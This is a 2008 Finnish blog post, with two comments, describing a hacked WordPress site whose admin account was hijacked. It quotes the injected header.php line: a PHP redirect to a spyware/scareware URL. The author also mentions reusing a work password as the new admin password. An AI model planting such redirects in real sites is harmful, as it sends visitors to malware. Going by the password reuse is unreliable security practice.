← Malware attack →
tiistaina 29. tammikuuta 2008 kello 10:00Tänä aamuna tajusin että rollemaa.orgin WP oli mystisesti mutatoitunut eilisiltapäivästä. Sivu oli täynnä virheilmoituksia ja header.php:n ensimmäinen rivi sisälsi seuraavan pätkän (älä mene tuohon osoitteeseen, se sisältää spywarea):
<?
header(“Location: http://scanner.malwarealarms.com/5/?advid=2241″);
?>
Admin-tunnukset oli ryöstetty, ja sähköpostiosoite muutettu lol@lol.ru -osoitteeksi. Menin phpMyAdminiin ja pengoin wp_usersin alta adminin ja vaihdoin sähköpostiosoitteen, jolloin sain salasanan vaihdettua. Myönnän että adminsalasanani oli aivan liian helppo, alkuajoilla keksitty. Nyt se on 14-kirjaiminen (sama kuin työadminkoneeni salasana, isoja ja pieniä kirjaimia ja numeroita sekaisin, muistan sen hyvin).
Liekö sitten kyseessä nykyisen WordPressin haavoittuvaisuus vai salasanan helppous… voisinpa tämän rohkaisemana päivittää WP:ni uusimpaan. Ilkeää.
auts :(
29. tammikuuta 2008 kello 11:33
Ouh :( Voihan olla mahdollista että palvelinkin on hakkeroitu, mutta toisaalta kuulostaa enemmän taas noilta konffi-exploit-scripteiltä.
No eihän WP ole niin hirveän turvallinen softa kuitenkaan, jos mietitään että jopa script kiddiet pääsee sivuston kaatamaan “hetkessä” hakuammulta scripteillään.
Mutta onhan muissakin blogisoftissa omat aukkonsa.
Kuinka monta merkkiä oli alkuperäisessä salasanassa? Jos haluamme nussia pilkkua voimme laskea sen muodostamisen maksimiajan ;)
4. helmikuuta 2008 kello 1:41